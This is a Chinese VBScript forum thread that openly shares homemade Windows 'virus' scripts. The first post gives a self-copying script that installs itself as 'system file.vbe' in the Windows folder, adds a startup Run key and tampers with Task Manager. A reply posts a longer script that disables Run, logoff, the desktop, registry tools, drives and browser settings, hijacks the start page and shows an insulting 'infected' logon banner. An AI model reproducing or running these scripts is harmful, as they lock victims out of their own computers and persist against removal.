发布一个病毒框架~不喜勿戳~
vbscript吧
全部回复
仅看楼主
level 2
291850650 楼主
*功能一:禁用【任务管理器】,判断系统文件夹下是否有此文件的复制文件即【system file.vbe】,若没有执行功能二,若有执行两道横线之间的源码
*功能二:复制自身到系统目录的【Windows】文件夹下并添加【开机启动】
2014年08月09日 03点08分 1
level 2
291850650 楼主
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = createobject("wscript.shell")
Set folder1 = fso.GetSpecialFolder(0)
ws.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgr",0,"REG_DWORD" *若不需要禁用任务管理器请删除此行
if (fso.fileexists(folder1 & "\system file.vbe")) then
*---------------------------------------------------------------------------
*请在这两道横线中间输入源码
*---------------------------------------------------------------------------
else
fso.Copyfile WScript.ScriptFullName,folder1 & "\system file.vbe"
ws.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\System",folder1 & "\system file.vbe"
end if
2014年08月09日 03点08分 2
level 9
你的要求已经得到满足
2014年08月11日 05点08分 3
wtf?
2014年08月11日 10点08分
回复 291850650 :置顶
2014年08月11日 10点08分
回复 H_氢 :[滑稽]
2014年08月12日 04点08分
level 10
楼主在么
2015年01月08日 00点01分 4

2015年01月08日 14点01分
回复 291850650 :[太开心][太开心][太开心]楼主我想请教您一个问题
2015年01月08日 14点01分
回复 291850650 :如何使用VBS脚本语言批量压缩文件 批量压缩所有盘符下所有以a123开头的文件,用通配符表示的话就是这样a123*.* 还有一个问题就是能不能添加密码???
2015年01月08日 14点01分
回复 3838438jkl :那你得去阅读rar说明书 看看有没有vbs支持[滑稽]
2015年01月08日 15点01分
level 1
大神大神,我想问你点事情
2015年01月12日 10点01分 5
嗯嗯
2015年01月12日 14点01分
回复 291850650 :我能加你扣扣吗[乖]
2015年01月12日 15点01分
回复 额都无语了6 :291850650[滑稽] 验证写个vbs来了
2015年01月13日 14点01分
level 1
看我的,除了你的功能以外还有很多强大功能哦。
On Error Resume Next
Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",63000000,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry",""
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","Win32system.vbs"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskBar",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","大傻逼!"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","中毒哩!"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",1,"REG_DWORD"
r.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Start Page","http://wenwen.soso.com/z/MyHome.htm?anchor=quick_answer-quesAnsw_tab_recomm#quick_answer-quesAnsw_tab_recomm "
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD"
2015年01月28日 03点01分 6
level 1
2015年01月28日 06点01分 7
切。。。。。。。病毒制造器
2015年01月28日 14点01分
level 4
人工置顶
2015年01月30日 16点01分 8
minecraft
2015年01月31日 17点01分
回复 291850650 :?
2015年01月31日 17点01分
level 4
楼主,问一下如何使用RegWrite建立注册表项。
2015年01月31日 17点01分 9
WS.RegWrite "路径","名称",“类型”
2015年02月01日 00点02分
1